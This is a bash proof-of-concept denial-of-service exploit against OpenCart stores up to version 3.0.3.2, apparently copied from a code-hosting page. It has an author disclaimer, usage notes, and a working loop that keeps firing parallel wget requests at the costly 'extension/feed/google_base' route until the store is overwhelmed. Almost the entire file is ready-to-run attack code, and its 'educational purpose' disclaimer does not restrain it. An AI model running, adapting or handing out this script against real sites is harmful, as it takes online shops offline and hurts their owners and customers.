58 lines
No EOL
1.7 KiB
Bash
Executable file
58 lines
No EOL
1.7 KiB
Bash
Executable file
#!/bin/bash
|
|
#
|
|
# Opencart <= 3.0.3.2 'extension/feed/google_base' Remote Denial of Service PoC exploit
|
|
#
|
|
# Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
|
|
#
|
|
# PoC exploit, just for test...
|
|
# Tested on store with added more than 1000 products
|
|
# Usage: ./cartkiller.sh store_url threads sleep
|
|
# Example: ./cartkiller.sh https://store_name 50 5
|
|
#
|
|
#
|
|
# Disclaimer:
|
|
# This or previous programs is for Educational
|
|
# purpose ONLY. Do not use it without permission.
|
|
# The usual disclaimer applies, especially the
|
|
# fact that Todor Donev is not liable for any
|
|
# damages caused by direct or indirect use of the
|
|
# information or functionality provided by these
|
|
# programs. The author or any Internet provider
|
|
# bears NO responsibility for content or misuse
|
|
# of these programs or any derivatives thereof.
|
|
# By using these programs you accept the fact
|
|
# that any damage (dataloss, system crash,
|
|
# system compromise, etc.) caused by the use
|
|
# of these programs is not Todor Donev's
|
|
# responsibility.
|
|
#
|
|
# Use them at your own risk!
|
|
#
|
|
|
|
echo "Opencart <= 3.0.3.2 'extension/feed/google_base' Remote Denial of Service PoC exploit"
|
|
echo
|
|
echo "Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>"
|
|
echo
|
|
echo "PoC exploit, just for test..."
|
|
echo "Tested on store with added more than 1000 products"
|
|
|
|
if [ -z "$3" ]; then
|
|
echo Usage: "$0" store_url threads sleep
|
|
echo Example: "$0" https://store_name 50 5
|
|
exit 4
|
|
fi
|
|
|
|
url="$1"
|
|
threads="$2"
|
|
sleep="$3"
|
|
while :
|
|
do
|
|
for ((i=1;i<=$2;i++));
|
|
do
|
|
wget "$url/index.php?route=extension/feed/google_base" --user-agent="Mozilla/5.0 (OpenCart Killer v2 google_base Denial Of Service)" --quiet -O /dev/null -o /dev/null &
|
|
done
|
|
#
|
|
# Sleep between loops..
|
|
#
|
|
sleep $sleep
|
|
done |